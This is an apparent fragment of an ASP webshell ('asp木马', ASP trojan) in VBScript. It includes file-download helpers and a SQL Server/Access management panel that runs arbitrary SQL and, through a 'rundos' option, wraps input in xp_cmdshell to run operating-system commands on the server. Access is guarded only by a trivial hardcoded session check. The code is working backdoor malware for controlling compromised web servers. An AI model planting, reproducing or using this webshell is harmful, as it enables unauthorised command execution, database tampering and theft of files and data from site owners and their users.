asp木马.asp

Asp木马.asp

	Next
End Function
Function tractName(lpfilename)
	nlen=len(lpfilename)
	For lpx = nlen To 1 step -1
		if mid(lpfilename,lpx,1)="\" then
			tractName=mid(lpfilename,lpx+1,100)
			exit Function
		end if
	Next
	tractName=""
End Function
function parentdir(t)
	t=replace(t,"/","\")
	ls=split(t,"\")
	for x=0 to ubound(ls)-2
	parentdir=parentdir+ls(x)&"\"
	next
	parentdir=replace(parentdir,chr(38),"%26")
End function
function pn(t)
	pn=replace(t,"/","\")
	if right(pn,1)="\" then pn=left(pn,len(pn)-1)
	if right(pn,1)="\" then pn=left(pn,len(pn)-1)
End function
function downFile(strFile)
	Response.Buffer = True
	Response.Clear
	Set s=Server.CreateObject(AdodbS)
	s.Open
	s.Type=1
	if not fs.FileExists(strFile) then Response.Write(strFile&"文件不存在！"):Response.End
	Set f=fs.GetFile(strFile)
	intFilelength=f.size
	s.LoadFromFile(strFile)
	if err then Response.Write("读文件出错:"&err.Description):Response.End
	Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
	Response.AddHeader "Content-Length", intFilelength
	Response.CharSet = "UTF-8"
	Response.ContentType = "application/octet-stream"
	Response.BinaryWrite s.Read
	response.flush
	response.clear
	s.Close
	Set s = Nothing
End Function 
function Tran(drv)
select case drv:case 0:Tran="怪盘":case 1:Tran="软盘":case 2:Tran="硬盘"
case 3:Tran="网络":case 4:Tran="光盘":case 5:Tran="RAM":end select:end function
response.end


end if
if Session("gl")="sql" then

function delhtml(str):delhtml=server.htmlencode(ltrim(str)):end function
function srs(lpstr)
	if isnull(lpstr) then
		srs=""
	else
		srs=lpstr
	end if
end function
self=request("url")
server.scriptTimeout=100000
bbf=chr(13)&chr(10)


echo "<title>sqlserver数据管理v0.2</title><meta http-equiv=""pragma"" content=""no-cache""><style>"&bbf
echo "form {color:#00000;font-size:9pt;}"&bbf
echo "table {color:#00000;font-size:9pt;}"&bbf
echo "body {color:#00000;font-size:9pt;}"&bbf
echo "span {cursor:hand;color:red;background-color:black;}"&bbf
echo "</style><script>function copys(s){"&bbf
echo "document.all.sqlstr.value=s;"&bbf
echo "}</script>"&bbf
echo "<script language=""javascript"">"&bbf
echo "function nom(){event.cancelBubble = true;event.returnValue = false;return false;}"&bbf
echo "function click() {if (event.button==2) {movable=(!movable);}nom();}"&bbf
echo "document.oncontextmenu=click"&bbf
echo "document.onmousedown=click"&bbf
echo "</script>"&bbf
echo "<body Leftmargin=""6"" Topmargin=""140"" onload=movediv()>"&bbf
echo "<script>"&bbf
echo "var movable=0;"&bbf
echo "function movediv(){"&bbf
echo "if(movable==1){"&bbf
echo "toolb.style.pixelTop= document.body.scrollTop;"&bbf
echo "toolb.style.pixelLeft= document.body.scrollLeft;"&bbf
echo "movs.innerHTML=""不浮动"";}"&bbf
echo "else{toolb.style.pixelTop= 0;toolb.style.pixelLeft= 0;"&bbf
echo "movs.innerHTML=""浮动"";}"&bbf
echo "setTimeout('movediv()',200);"&bbf
echo "}"&bbf
echo "</script>"&bbf
echo "<div id=toolb style=""position:absolute;Left:10px;Top:0px;width:100%;background-color:#eeeeee""> "&bbf
echo "<table cellspacing=0 cellpadding=0 width=100% border=1><tr><td>"&bbf
echo "<form action="""&self&"?table="&request("table")&""" method=post name=form1>"&bbf
echo "<span onclick=document.location="""&self&"?c=3"">显示库列表</span> -"&bbf
echo "<span onclick=document.location="""&self&"?c=1"">显示所有表</span> -"&bbf
echo "<span onclick=sel();>显示当前表</span> -"&bbf
echo "<span onclick=ins();>insert</span> -"&bbf
echo "<span onclick=del();>delete</span> -"&bbf
echo "<span onclick=drop();>drop</span> -"&bbf
echo "<span onclick=createt();>create</span> -"&bbf
echo "只显[<span onclick=document.location="""&self&"?c=100"">仅用户表</span>"&bbf
echo "<span onclick=document.location="""&self&"?c=101"">所有表</span>"&bbf
echo "<span onclick=document.location="""&self&"?c=102"">仅前20条</span>"&bbf
echo "<span onclick=document.location="""&self&"?c=103"">所有条</span>] -"&bbf
echo "[<span onclick=document.location="""&self&"?c=886"">exit</span>]"&bbf
echo "<script>function createt(){document.all.sqlstr.value='create table "&session("dbo")&"[] ([id] int identity(1,1)/*mdb=autoincrement*/)';}</script>"&bbf
echo "<textarea name=sqlstr cols=106 rows=5>"&request("sqlstr")&"</textarea><br>"&bbf
echo "<input type=submit name=ppp value=runsql>"&bbf
echo "<input type=submit name=ppp value=rundos>"&bbf
echo "<input type=""checkbox"" value=""n"" name=""sc"">不显示结果"&bbf
echo "<span id=movs onclick=""javascript:movable=(!movable)"">浮动</span>"&bbf
echo "</td></tr></form></table></div>"&bbf


if request("c")=886 then
	session("islogin")=""
	response.write "<script>location='"&self&"';</script>"
	response.end
end if
if session("islogin")<>"ok" then
	pass=request("pass")
	if pass="islogin" then
		session("islogin")="ok"
	else
		

echo "<div style=position:absolute;width:100%;Left:10px;Top:150px;><form method=post>"&bbf
echo "		<input type=hidden name=pass value=islogin><br>"&bbf
echo "		host:<input type=text name=host value="&sahost&"><br>"&bbf
echo "		user:<input type=text name=user value="&sauser&"><br>"&bbf
echo "		pass:<input type=text name=upass value="&sapass&"><br>"&bbf
echo "		dbase<input type=text name=database value="&request("database")&"><br>"&bbf
echo "		<input type=submit></form></div>"

		response.end
	end if
end if



function echo(lpstr):response.write lpstr:end function
Function GetTableFromSQL(Byval SQL)
	Dim charPos, charLen, wordlist
	SQL = LCase(SQL)
	charPo1 = InStr(1, SQL, " from ")
	if charPo1<1 then charPo1 = InStr(1, SQL, " into ")
	if charPo1<1 then charPo1 = InStr(1, SQL, "update")
	if charPo1>0 then
		charPo2 = InStr(charPo1+7, SQL, " ")
		If charPo2 > 0 Then
			SQL = Mid(SQL, charPo1+6, charPo2)
		Else
			SQL = Mid(SQL, charPo1+6)
		End If
		If Left(SQL, 1) = "[" Then SQL = Mid(SQL, 2)
		If Right(SQL, 1) = "]" Then SQL = Left(SQL, Len(SQL) - 1)
		GetTableFromSQL = SQL
	end if
End Function

dsnname     =  "data source="&request("host")&";"
dsnusername =  "user id="&request("user")&";"
if request("upass")<>"" then dsnpassword = "password="&request("upass")&";"
if request("database")<>"" then session("schoolname")=request("database"):response.redirect self&"?c=1"
if session("schoolname")="" then session("schoolname")= "master"


set adoconn = server.createobject("adodb.connection")
if request("host")<>"" then
	if mid(lcase(request("host")),2,1)=":" then
		connectionstring="DRIVER={Microsoft Access Driver (*.mdb)};DBQ="&_
			request("host")&";pwd="&request("upass")
		echo connectionstring
		session("IsMDB")=1
		session("dbo")=""
		session("dsnname")=request("host")
	else
		session("dsnname")=dsnname
		connectionstring = "provider=sqloledb.1;"&dsnname&dsnusername&dsnpassword
		session("IsMDB")=0
		session("dbo")="[dbo]."
	end if
	session("connectionstring")=connectionstring
	session("only_top_20")="top 20"
end if
echo session("dsnname")&"<br>"
adoconn.open session("connectionstring")
adoconn.cursorlocation=3
if session("IsMDB")=0 then adoconn.execute("use "&session("schoolname"))

command=request("c")
sqlstr=request.form("sqlstr")
table=request("table")
if table="" then table=GetTableFromSQL(sqlstr)


if len(sqlstr)>0 then
		if left(sqlstr,5)="edit " then sprocedure(mid(sqlstr,6)):sqlstr=""
		if left(sqlstr,4)="all " then run_ml(mid(sqlstr,5)):sqlstr=""
		runsqls=split(sqlstr,bbf)
		for k=0 to ubound(runsqls)
			if request("ppp")="rundos" then
				runsqls(k)="exec master.dbo.xp_cmdshell '"&runsqls(k)&"'"

			end if
			echo runsqls(k)&"----"&"<br>"
			if len(runsqls(k))>0 then
				set rs=adoconn.execute(runsqls(k))
				if request("sc")<>"n" then
					if request("ppp")<>"rundos" then
						showsss rs
					else
						for oi=1 to rs.recordcount
							reword=srs(rs(0).value)
							if reword<>"" then
								reword=replace(reword,"<",chr(38)&"lt")
								reword=replace(reword,"  "," &nbsp")
								echo reword&"<br>"&bbf
							end if
							rs.movenext
						next
					end if
				end if
			end if
		next
end if


if command=1 then
	if session("IsMDB")=1 then
		Set ADOX = Server.CreateObject("ADOX.Catalog")
		ADOX.ActiveConnection = adoconn
		For Each tb in ADOX.Tables
			If tb.Type = "TABLE" Then
			

echo "			<a href="&self&"?c=2&table="&tb.Name&">"&bbf
echo "				"&tb.Name &"</a><br>"&bbf
echo "			"
End If
		Next
		response.end
	else
		sql="select name from sysobjects where "&_
			"objectproperty(object_id(name),'istable')=1"&session("only_user_table")
		set rs=adoconn.execute(sql)
		for iz=1 to rs.recordcount
			echo "<a href="&self&"?c=2&table="&rs(0).value&_
				">"&rs(0).value&"</a><br>"
			rs.movenext
		next
	end if
end if

if command=2 then
	if table<>"" then
		set rs=adoconn.execute("select "&session("only_top_20")&" * from "&session("dbo")&table)
		showsss rs
		echo "</table>"
		echo "<script>"&scripts&"</script>"&insert
	end if
end if

if command=3 then
	set rs=adoconn.execute("select name,filename from master..sysdatabases")
	echo "<table>"
	for dd=1 to rs.recordcount
		echo "<tr><td><a href="&self&"?database="&rs(0).value&">"&rs(0).value&"</a></td><td>"&rs(1).value&"</td></tr>"
		rs.movenext
	next
	echo "</table>"
end if